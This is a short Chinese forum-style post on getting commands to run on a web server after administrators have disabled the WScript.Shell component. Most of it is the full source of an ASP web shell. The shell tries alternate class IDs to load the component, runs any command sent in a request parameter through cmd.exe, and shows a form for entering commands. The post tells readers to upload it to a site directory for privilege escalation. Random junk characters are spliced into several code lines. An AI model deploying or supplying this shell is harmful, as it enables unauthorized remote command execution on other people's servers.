wscript.shell删除解决办法

admin

可能有很多人，看到关闭了wscript.shell,就感觉没提权的希望了。就会放弃。
) Q; Y5 R% y2 B一般当闭上面组件时，你上传cmd.exe到上面去是运行不了命令的。运行时会说出错。
+ M6 s9 q) M) x4 m% s要想让运行命令可以试试这种方法，成功率为五五之数。
把下面代码复制：
8 |' n" R! y: E1 _) H<object runat=server id=oScriptlhn scope=page classid="clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8"></object>
' H8 a# ~& G' ~) e* T9 i# P/ b# B<%if err then%>
<object runat=server id=oScriptlhn scope=page classid="clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B"></object>
<%
- C7 @' _, ^; x1 ~, O; x  i4 f# m# rend if
5 @: F* [7 n. eresponse.write("<textarea readonly cols=80 rows=20>")
On Error Resume Next
% o7 f) |& b* R' S3 wresponse.write oScriptlhn.exec("cmd.exe /c" & request("c")).stdout.readall
response.write("</textarea>")
$ b: g, w9 ~# T; P& Sresponse.write("<form method='post'>")
response.write("<input type=text name='c' size=60><br>")
/ x$ a0 I: W0 t6 P; G, Yresponse.write("<input type=submit value='执行'></form>")
7 g" G8 q3 g2 z6 L& n5 G2 P%>
9 u  m& ^" I8 L/ j( N
保存为一个asp文件，然后传到网站目录上去
- ]3 q2 Q* N0 N' v- I运行的时候可能会出现两个问题，第一是运行了为什么运行不了命令，这个你可以试着再上传个cmd.exe然后把路径写入上面代码。
! L& X2 ^5 J. C- V. S我用此成功运行过cacls命令。

2 E. R! N% C9 k7 ]' \5 z0 Y第二那就是运行时出错，可能限制某些代码执行